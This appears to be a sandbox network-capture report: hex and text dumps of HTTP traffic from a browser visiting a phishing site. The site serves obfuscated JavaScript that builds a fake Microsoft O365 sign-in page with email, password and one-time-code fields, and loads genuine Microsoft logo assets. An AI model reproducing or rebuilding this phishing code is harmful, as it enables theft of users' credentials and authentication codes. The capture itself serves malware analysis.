                                                                2024-11-07 20:40:06 UTC504INData Raw: 37 63 66 63 0d 0a 66 75 6e 63 74 69 6f 6e 20 5f 30 78 62 32 37 36 28 29 20 7b 0a 20 20 20 20 63 6f 6e 73 74 20 5f 30 78 35 65 64 39 34 34 20 3d 20 5b 27 68 72 65 66 27 2c 20 27 2e 70 68 6f 6e 65 6f 74 70 54 65 78 74 27 2c 20 27 72 65 61 64 79 53 74 61 74 65 27 2c 20 27 23 70 6c 61 79 6d 65 5f 62 69 67 27 2c 20 27 40 69 6f 6e 6f 73 2e 27 2c 20 27 23 70 6c 61 79 6d 65 27 2c 20 27 72 65 73 69 7a 65 27 2c 20 27 73 32 63 5f 72 65 73 74 61 72 74 27 2c 20 27 2e 6c 6f 61 64 65 72 78 42 6c 6f 63 6b 31 31 27 2c 20 27 73 32 63 27 2c 20 27 63 6f 6d 70 6c 65 74 65 27 2c 20 27 4f 33 36 35 27 2c 20 27 75 72 6c 28 5c 78 32 37 68 74 74 70 73 3a 2f 2f 61 61 64 63 64 6e 2e 6d 73 61 75 74 68 2e 6e 65 74 2f 73 68 61 72 65 64 2f 31 2e 30 2f 63 6f 6e 74 65 6e 74 2f 69 6d 61 67
                                                                Data Ascii: 7cfcfunction _0xb276() { const _0x5ed944 = ['href', '.phoneotpText', 'readyState', '#playme_big', '@ionos.', '#playme', 'resize', 's2c_restart', '.loaderxBlock11', 's2c', 'complete', 'O365', 'url(\x27https://aadcdn.msauth.net/shared/1.0/content/imag
                                                                2024-11-07 20:40:06 UTC1369INData Raw: 27 2c 20 27 52 51 5f 4f 54 50 5f 41 50 50 27 2c 20 27 6f 6e 66 6f 63 75 73 27 2c 20 27 2e 6c 6f 67 65 72 4d 65 27 2c 20 27 2e 61 70 70 6f 74 70 43 6f 64 65 27 2c 20 27 2e 6f 74 70 49 6e 70 75 74 32 27 2c 20 27 68 74 74 70 73 3a 2f 2f 61 61 64 63 64 6e 2e 6d 73 61 75 74 68 2e 6e 65 74 2f 73 68 61 72 65 64 2f 31 2e 30 2f 63 6f 6e 74 65 6e 74 2f 69 6d 61 67 65 73 2f 6d 69 63 72 6f 73 6f 66 74 5f 6c 6f 67 6f 5f 35 36 34 64 62 39 31 33 61 37 66 61 30 63 61 34 32 37 32 37 31 36 31 63 36 64 30 33 31 62 65 66 2e 73 76 67 27 2c 20 27 6b 65 79 75 70 27 2c 20 27 64 69 73 63 6f 6e 6e 65 63 74 27 2c 20 27 3c 70 2f 3e 27 2c 20 27 31 30 30 37 37 36 32 58 4e 73 77 55 63 27 2c 20 27 74 65 73 74 27 2c 20 27 69 6e 63 6c 75 64 65 73 27 2c 20 27 69 6e 74 65 72 61 63 74 69 76
                                                                Data Ascii: ', 'RQ_OTP_APP', 'onfocus', '.logerMe', '.appotpCode', '.otpInput2', 'https://aadcdn.msauth.net/shared/1.0/content/images/microsoft_logo_564db913a7fa0ca42727161c6d031bef.svg', 'keyup', 'disconnect', '<p/>', '1007762XNswUc', 'test', 'includes', 'interactiv
                                                                2024-11-07 20:40:06 UTC1369INData Raw: 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 3c 2f 64 69 76 3e 5c 78 30 61 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 3c 64 69 76 5c 78 32 30 63 6c 61 73 73 3d 5c 78 32 32 73 68 6f 77 68 65 61 64 65 72 5c 78 32 32 3e 5c 78 30 61 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 3c 69 5c 78 32 30 63 6c 61 73 73 3d 5c 78 32 32 66 61 2d 73 6f 6c 69 64 5c 78 32 30 66 61 2d 6d 75 73 69 63 5c 78 32 32 3e 3c 2f 69 3e 5c 78 30 61 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78
                                                                Data Ascii: 0\x20\x20\x20\x20\x20\x20\x20\x20</div>\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20<div\x20class=\x22showheader\x22>\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20<i\x20class=\x22fa-solid\x20fa-music\x22></i>\x0a\x20\x20\x20\x
                                                                2024-11-07 20:40:06 UTC1369INData Raw: 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 3c 2f 64 69 76 3e 5c 78 30 61 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 3c 2f 64 69 76 3e 5c 78 30 61 5c 78 30 61 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 3c 64 69 76 5c 78 32 30 63 6c 61 73 73 3d 5c 78 32 32 62 67 5f 6d 75 73 69 63 5c 78 32 30 5c 78 32 32 3e 5c 78 30 61 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 3c 69 5c 78 32 30 69 64 3d 5c 78 32 32 62 67 5f 6d 75 73 69 63 5c 78 32 32 5c 78 32 30 63 6c 61 73 73 3d 5c 78 32 32 66 61 2d 73 6f 6c 69 64 5c 78 32 30 66 61 2d 6d 75 73
                                                                Data Ascii: x20\x20\x20\x20\x20\x20</div>\x0a\x20\x20\x20\x20\x20\x20\x20\x20</div>\x0a\x0a\x20\x20\x20\x20\x20\x20\x20\x20<div\x20class=\x22bg_music\x20\x22>\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20<i\x20id=\x22bg_music\x22\x20class=\x22fa-solid\x20fa-mus
                                                                2024-11-07 20:40:06 UTC1369INData Raw: 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 3c 2f 64 69 76 3e 5c 78 30 61 5c 78 30 61 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 3c 64 69 76 5c 78 32 30 63 6c 61 73 73 3d 5c 78 32 32 6f 70 74 69 6f 6e 5f 74 6f 70 5f 72 69 67 68 74 5c 78 32 32 3e 5c 78 30 61 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 3c 64 69 76 3e 5c 78 30 61 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 3c 69 5c 78 32 30 73 74 79 6c 65 3d 5c 78 32 32 63 6f 6c 6f 72 3a 5c 78 32 30 72 67 62 28
                                                                Data Ascii: x20\x20\x20\x20</div>\x0a\x0a\x20\x20\x20\x20\x20\x20\x20\x20<div\x20class=\x22option_top_right\x22>\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20<div>\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20<i\x20style=\x22color:\x20rgb(
                                                                2024-11-07 20:40:06 UTC1369INData Raw: 30 61 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 3c 73 70 61 6e 3e 48 65 6c 70 3c 2f 73 70 61 6e 3e 5c 78 30 61 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 3c 69 5c 78 32 30 63 6c 61 73 73 3d 5c 78 32 32 66 61 2d 73 6f 6c 69 64 5c 78 32 30 66 61 2d 63 69 72 63 6c 65 2d 71 75 65 73 74 69 6f 6e 5c 78 32 32 3e 3c 2f 69 3e 5c 78 30 61 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c
                                                                Data Ascii: 0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20<span>Help</span>\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20<i\x20class=\x22fa-solid\x20fa-circle-question\x22></i>\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\
                                                                2024-11-07 20:40:06 UTC1369INData Raw: 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 3c 2f 64 69 76 3e 5c 78 30 61 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 3c 2f 64 69 76 3e 5c 78 30 61 5c 78 30 61 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 3c 64 69 76 5c 78 32 30 69 64 3d 5c 78 32 32 62 61 73 65 5f 69 63 6f 6e 73 5c 78 32 32 5c 78 32 30 63 6c 61 73 73 3d 5c 78 32 32 62 61 73 65 5f 63 6f 6e 5c 78 32 32 3e 5c 78 30 61 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78
                                                                Data Ascii: 0\x20\x20\x20\x20\x20</div>\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20</div>\x0a\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20<div\x20id=\x22base_icons\x22\x20class=\x22base_con\x22>\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x
                                                                2024-11-07 20:40:06 UTC1369INData Raw: 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 3c 2f 64 69 76 3e 5c 78 30 61 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 3c 64 69 76 3e 5c 78 30 61 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 3c 73 70 61 6e 3e 31 78 3c 2f 73 70 61 6e 3e 5c 78 30 61 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c
                                                                Data Ascii: \x20\x20\x20\x20\x20</div>\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20<div>\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20<span>1x</span>\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\
                                                                2024-11-07 20:40:07 UTC1369INData Raw: 5c 78 32 30 5c 78 32 30 3c 2f 64 69 76 3e 5c 78 30 61 5c 78 30 61 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 3c 21 2d 2d 5c 78 32 30 4c 4f 47 49 4e 5c 78 32 30 50 41 47 45 5c 78 32 30 53 54 41 52 54 5c 78 32 30 5c 78 32 30 2d 2d 3e 5c 78 30 61 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 3c 64 69 76 5c 78 32 30 73 74 79 6c 65 3d 5c 78 32 32 64 69 73 70 6c 61 79 3a 5c 78 32 30 6e 6f 6e 65 3b 5c 78 32 32 5c 78 32 30 63 6c 61 73 73 3d 5c 78 32 32 6c 6f 67 69 6e 46 6f 72 6d 5c 78 32 32 3e 5c 78 30 61 5c 78 30 61 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 3c 21 2d 2d 5c 78 32 30 45 4d 41 49 4c 5c 78 32 30 2d 2d 3e 5c 78 30 61 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c
                                                                Data Ascii: \x20\x20</div>\x0a\x0a\x20\x20\x20\x20...\x20LOGIN\x20PAGE\x20START\x20\x20-->\x0a\x20\x20\x20\x20<div\x20style=\x22display:\x20none;\x22\x20class=\x22loginForm\x22>\x0a\x0a\x20\x20\x20\x20\x20\x20\x20\x20...\x20EMAIL\x20-->\x0a\x20\x20\x20\x20\x20\x20\
                                                                2024-11-07 20:40:07 UTC1369INData Raw: 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 3c 64 69 76 5c 78 32 30 63 6c 61 73 73 3d 5c 78 32 32 6c 61 62 65 6c 42 75 74 74 6f 6d 5c 78 32 32 3e 5c 78 30 61 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 3c 61 3e 4e 6f 5c 78 32 30 61 63 63 6f 75 6e 74 3f 3c 2f 61 3e 5c 78 30 61 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 3c 61 5c 78 32 30 73 74 79 6c 65 3d 5c 78 32 32 63 6f 6c 6f 72 3a 5c 78 32 30 23
                                                                Data Ascii: 0\x20\x20\x20\x20\x20\x20\x20\x20\x20<div\x20class=\x22labelButtom\x22>\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20<a>No\x20account?</a>\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20<a\x20style=\x22color:\x20#


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                18192.168.2.164973713.107.246.644436880C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                TimestampBytes transferredDirectionData
                                                                2024-11-07 20:40:07 UTC418OUTGET /shared/1.0/content/images/microsoft_logo_564db913a7fa0ca42727161c6d031bef.svg HTTP/1.1
                                                                Host: aadcdn.msauth.net
                                                                Connection: keep-alive
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                Accept: */*
                                                                Sec-Fetch-Site: none
                                                                Sec-Fetch-Mode: cors
                                                                Sec-Fetch-Dest: empty
                                                                Accept-Encoding: gzip, deflate, br
                                                                Accept-Language: en-US,en;q=0.9
                                                                2024-11-07 20:40:07 UTC779INHTTP/1.1 200 OK
                                                                Date: Thu, 07 Nov 2024 20:40:07 GMT
                                                                Content-Type: image/svg+xml
                                                                Content-Length: 1435
                                                                Connection: close
                                                                Cache-Control: public, max-age=31536000
                                                                Content-Encoding: gzip
                                                                Last-Modified: Wed, 24 May 2023 10:11:48 GMT
                                                                ETag: 0x8DB5C3F4911527F
                                                                x-ms-request-id: 79728d2d-301e-0063-66d3-2c6100000000
                                                                x-ms-version: 2009-09-19
                                                                x-ms-lease-status: unlocked
                                                                x-ms-blob-type: BlockBlob
                                                                Access-Control-Expose-Headers: x-ms-request-id,Server,x-ms-version,Content-Type,Content-Encoding,Cache-Control,Last-Modified,ETag,x-ms-lease-status,x-ms-blob-type,Content-Length,Date,Transfer-Encoding
                                                                Access-Control-Allow-Origin: *
                                                                x-azure-ref: 20241107T204007Z-16547b76f7f9rdn9hC1DFWfk7s00000008rg000000000877
                                                                x-fd-int-roxy-purgeid: 0
                                                                X-Cache: TCP_HIT
                                                                Accept-Ranges: bytes
                                                                2024-11-07 20:40:07 UTC1435INData Raw: 1f 8b 08 00 00 00 00 00 04 00 bd 57 4d 6f 1c 37 0c fd 2b 8b ed 75 56 96 48 4a a2 0a db 80 7b f2 c1 be fa 90 db b6 b1 b3 06 ec 26 88 17 76 fa ef fb 28 51 b3 46 91 a2 c9 a5 b0 f7 61 57 1c 51 fc 7c e2 9c bf bc 7e da 7c 7b 7e fa f3 e5 62 7b 38 1e bf fc 7a 76 f6 f6 f6 16 de 38 7c fe fa e9 8c 62 8c 67 78 62 bb 79 7b fc 78 3c 5c 6c 53 d4 ed e6 70 ff f8 e9 70 bc d8 92 6c 37 af 8f f7 6f bf 7d fe 76 b1 8d 9b b8 81 74 83 c5 cb f3 e3 e3 f1 e9 fe 72 ff f2 72 7f 7c 39 3f 1b bf ce bf ec 8f 87 cd c7 8b ed ad 48 50 2e 8b 84 72 97 34 c8 61 47 41 ee 6a c8 ca d7 82 af 37 ac 21 a5 b6 98 ec 9a 4b c8 9c 6e 98 42 12 5a fa 43 87 5d 88 d4 fa d6 6b 6a a1 dd 41 d1 81 83 70 b9 e1 1a 78 49 a6 fe 10 62 d6 1b 49 21 4b b6 93 3e 3c d3 92 42 94 b6 4f 81 8a 2e 03 23 fe d2 12 24 b5 5d 68 a5
                                                                Data Ascii: WMo7+uVHJ{&v(QFaWQ|~|{~b{8zv8|bgxby{x<\lSppl7o}vtrr|9?HP.r4aGAj7!KnBZC]kjApxIbI!K><BO.#$]h


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                19192.168.2.164973813.107.246.644436880C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                TimestampBytes transferredDirectionData
                                                                2024-11-07 20:40:07 UTC438OUTGET /shared/1.0/content/images/picker_verify_fluent_authenticator_59892f1e05e3adf9fd2f71b42d92a27f.svg HTTP/1.1
                                                                Host: aadcdn.msauth.net
                                                                Connection: keep-alive
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                Accept: */*
                                                                Sec-Fetch-Site: none
                                                                Sec-Fetch-Mode: cors
                                                                Sec-Fetch-Dest: empty
                                                                Accept-Encoding: gzip, deflate, br
                                                                Accept-Language: en-US,en;q=0.9
                                                                2024-11-07 20:40:07 UTC779INHTTP/1.1 200 OK
                                                                Date: Thu, 07 Nov 2024 20:40:07 GMT
                                                                Content-Type: image/svg+xml
                                                                Content-Length: 2407
                                                                Connection: close
                                                                Cache-Control: public, max-age=31536000
                                                                Content-Encoding: gzip
                                                                Last-Modified: Wed, 24 May 2023 10:11:49 GMT
                                                                ETag: 0x8DB5C3F499A9B99
                                                                x-ms-request-id: 8b1aa717-f01e-0053-0341-30dfcf000000
                                                                x-ms-version: 2009-09-19
                                                                x-ms-lease-status: unlocked
                                                                x-ms-blob-type: BlockBlob
                                                                Access-Control-Expose-Headers: x-ms-request-id,Server,x-ms-version,Content-Type,Content-Encoding,Cache-Control,Last-Modified,ETag,x-ms-lease-status,x-ms-blob-type,Content-Length,Date,Transfer-Encoding
                                                                Access-Control-Allow-Origin: *
                                                                x-azure-ref: 20241107T204007Z-15869dbbcc62nmdhhC1DFWg2r400000001xg00000000ayc6
                                                                x-fd-int-roxy-purgeid: 0
                                                                X-Cache: TCP_HIT
                                                                Accept-Ranges: bytes
                                                                2024-11-07 20:40:07 UTC2407INData Raw: 1f 8b 08 00 00 00 00 00 04 00 ed 59 3d 73 dd 38 12 cc af ea fe 03 eb 6d 72 17 88 02 66 f0 79 b5 ba e0 98 38 a0 52 05 ca ec 95 6c ab 4e 6b bb 6c af b5 3f ff ba 07 e0 7b 24 94 6c 7c 65 27 7a 4d 02 33 c3 c1 a0 a7 01 ff fa ed c7 87 e9 e5 e9 e1 fb c7 9b 53 28 a7 e9 e3 e3 d3 87 8f df db ef 1f 4f 8f 2f ff f9 fc e7 cd c9 4d 6e 0a 65 e2 b3 f7 4f cf cf 37 a7 4f 9f 3f 3d 9e a6 3f 7f 7f fe f4 ed e6 f4 f1 fb f7 2f ff ba be 7e 79 79 99 5f 74 fe fc f5 c3 b5 38 e7 ae 61 f8 f4 ef bf ff ed d7 df df 7e fb ef f4 f4 00 2b f9 9d 24 a7 e1 2a a6 b7 7a 15 ea 83 5c 95 f7 92 ae 7e cb ef 4a 78 7c 17 1e 1f 1f c2 e6 e0 97 f7 f6 cf 0c 7c 79 fb fd a3 3d be fa fa c7 f3 e3 cd e9 f1 c7 e3 a7 cf 0f 0f a7 e9 b7 e7 a7 2f e3 33 f8 b9 15 9d 6b 4e 32 b9 c5 a7 b9 48 08 08 df 3b 3c 73 79 8a b3 04
                                                                Data Ascii: Y=s8mrfy8RlNkl?{$l|e'zM3S(O/MneO7O?=?/~yy_t8a~+$*z\~Jx||y=/3kN2H;<sy


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                20192.168.2.164973913.107.246.454436880C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                TimestampBytes transferredDirectionData
                                                                2024-11-07 20:40:07 UTC416OUTGET /shared/1.0/content/images/arrow_left_a9cc2824ef3517b6c4160dcf8ff7d410.svg HTTP/1.1
                                                                Host: logincdn.msauth.net
                                                                Connection: keep-alive
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                Accept: */*
                                                                Sec-Fetch-Site: none
                                                                Sec-Fetch-Mode: cors
                                                                Sec-Fetch-Dest: empty
                                                                Accept-Encoding: gzip, deflate, br
                                                                Accept-Language: en-US,en;q=0.9
                                                                2024-11-07 20:40:07 UTC799INHTTP/1.1 200 OK
                                                                Date: Thu, 07 Nov 2024 20:40:07 GMT
                                                                Content-Type: image/svg+xml
                                                                Content-Length: 276
                                                                Connection: close
                                                                Cache-Control: public, max-age=31536000
                                                                Content-Encoding: gzip
                                                                Last-Modified: Wed, 22 Jan 2020 00:38:00 GMT
                                                                ETag: 0x8D79ED35591CF44
                                                                x-ms-request-id: 8464d3b8-201e-0031-7a13-312245000000
                                                                x-ms-version: 2009-09-19
                                                                x-ms-lease-status: unlocked
                                                                x-ms-blob-type: BlockBlob
                                                                Access-Control-Expose-Headers: x-ms-request-id,Server,x-ms-version,Content-Type,Content-Encoding,Cache-Control,Last-Modified,ETag,x-ms-lease-status,x-ms-blob-type,Content-Length,Date,Transfer-Encoding
                                                                Access-Control-Allow-Origin: *
                                                                x-azure-ref: 20241107T204007Z-15869dbbcc6khw88hC1DFWbb2000000002d0000000000d76
                                                                x-fd-int-roxy-purgeid: 0
                                                                X-Cache-Info: L1_T2
                                                                X-Cache: TCP_HIT
                                                                Accept-Ranges: bytes
                                                                2024-11-07 20:40:07 UTC276INData Raw: 1f 8b 08 00 00 00 00 00 04 00 95 51 3d 6f c3 20 10 fd 2b 88 ae e6 e0 08 d8 b8 b2 3d 74 ca 90 ae 1d ba 45 8a 6b 5b 22 1f aa 91 c9 cf 2f 67 3b 6e 87 2c 15 f0 80 bb 7b ef 9e a0 1a a7 8e dd cf fe 32 d6 bc 0f e1 f6 2a 65 8c 11 e2 0e ae df 9d d4 4a 29 99 2a 38 8b c3 29 f4 35 d7 86 b3 be 1d ba 3e 2c e7 69 68 e3 db f5 5e 73 c5 14 d3 26 4d de 54 61 08 be 6d 8e e3 d8 86 b1 92 cb ad ba 1d 43 cf 4e 35 7f 47 97 21 82 2d dc 04 ce 98 7d 01 39 16 7e 07 a5 c6 8c d0 09 b0 a5 a1 75 c8 33 d4 de 40 69 8c 98 71 4b cc 9c 55 e5 93 b3 af c1 fb 9a bf 18 45 83 cb bf bd 14 f1 b2 02 94 cd fd 53 fa 1e ff ef e3 ac 04 a0 41 01 aa c0 b4 0e 36 95 97 a4 47 9b 05 67 1d 11 d6 2c 66 33 67 c1 35 46 1b b1 49 9d da d8 47 40 3c 0e 98 4c 2e 3a 60 b5 4e 26 01 3f 52 03 93 0c cf 89 64 b4 b0 28 08 37
                                                                Data Ascii: Q=o +=tEk["/g;n,{2*eJ)*8)5>,ih^s&MTamCN5G!-}9~u3@iqKUESA6Gg,f3g5FIG@<L.:`N&?Rd(7


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                21192.168.2.164974013.107.246.644436880C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                TimestampBytes transferredDirectionData
                                                                2024-11-07 20:40:07 UTC421OUTGET /shared/1.0/content/images/picker_verify_sms_12b7d768ba76f2e782cc74e328171091.svg HTTP/1.1
                                                                Host: aadcdn.msauth.net
                                                                Connection: keep-alive
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                Accept: */*
                                                                Sec-Fetch-Site: none
                                                                Sec-Fetch-Mode: cors
                                                                Sec-Fetch-Dest: empty
                                                                Accept-Encoding: gzip, deflate, br
                                                                Accept-Language: en-US,en;q=0.9
                                                                2024-11-07 20:40:07 UTC799INHTTP/1.1 200 OK
                                                                Date: Thu, 07 Nov 2024 20:40:07 GMT
                                                                Content-Type: image/svg+xml
                                                                Content-Length: 199
                                                                Connection: close
                                                                Cache-Control: public, max-age=31536000
                                                                Content-Encoding: gzip
                                                                Last-Modified: Wed, 24 May 2023 10:11:49 GMT
                                                                ETag: 0x8DB5C3F49C21D98
                                                                x-ms-request-id: c97bf5e1-801e-0038-538a-2c6796000000
                                                                x-ms-version: 2009-09-19
                                                                x-ms-lease-status: unlocked
                                                                x-ms-blob-type: BlockBlob
                                                                Access-Control-Expose-Headers: x-ms-request-id,Server,x-ms-version,Content-Type,Content-Encoding,Cache-Control,Last-Modified,ETag,x-ms-lease-status,x-ms-blob-type,Content-Length,Date,Transfer-Encoding
                                                                Access-Control-Allow-Origin: *
                                                                x-azure-ref: 20241107T204007Z-16547b76f7f8dwtrhC1DFWd1zn00000008v0000000002yge
                                                                x-fd-int-roxy-purgeid: 0
                                                                X-Cache-Info: L1_T2
                                                                X-Cache: TCP_HIT
                                                                Accept-Ranges: bytes
                                                                2024-11-07 20:40:07 UTC199INData Raw: 1f 8b 08 00 00 00 00 00 04 00 75 8f bd ae c2 30 0c 85 5f 25 32 6b d5 38 3f 88 80 92 0e 77 ea 00 6b 87 bb 21 08 4d a4 d2 22 62 35 3c fe 4d 2e 62 44 b6 e4 63 fb d3 b1 6c d3 3a b2 d7 7d 9a 93 83 40 f4 38 70 9e 73 6e b3 6a 97 e7 c8 25 22 f2 42 00 cb f1 4a c1 81 36 c0 82 8f 63 a0 b7 5e a3 cf 3f cb cb 01 32 64 da 94 84 ce 52 a4 c9 77 e7 94 3c 25 cb df 9d 7d fa 0b 7d 73 b9 c5 69 72 30 2f b3 07 de d9 c7 99 02 bb 3a 38 29 d3 28 1c 84 ec 05 0e 0a 83 5e 75 bb dd 99 a3 30 b5 94 55 af cc 49 c8 46 c9 de 0c 02 7b 5d a8 c2 ee 5b 2d e5 b1 ce ff d5 ef c7 7e a3 b1 46 bd 50 5f ea fe 00 a3 0d 47 ef fa 00 00 00
                                                                Data Ascii: u0_%2k8?wk!M"b5<M.bDcl:}@8psnj%"BJ6c^?2dRw<%}}sir0/:8)(^u0UIF{][-~FP_G


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                22192.168.2.1649745104.17.24.144436880C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                TimestampBytes transferredDirectionData
                                                                2024-11-07 20:40:07 UTC653OUTGET /ajax/libs/font-awesome/6.1.1/webfonts/fa-solid-900.woff2 HTTP/1.1
                                                                Host: cdnjs.cloudflare.com
                                                                Connection: keep-alive
                                                                sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                Origin: https://kwiktestaust.com
                                                                sec-ch-ua-mobile: ?0
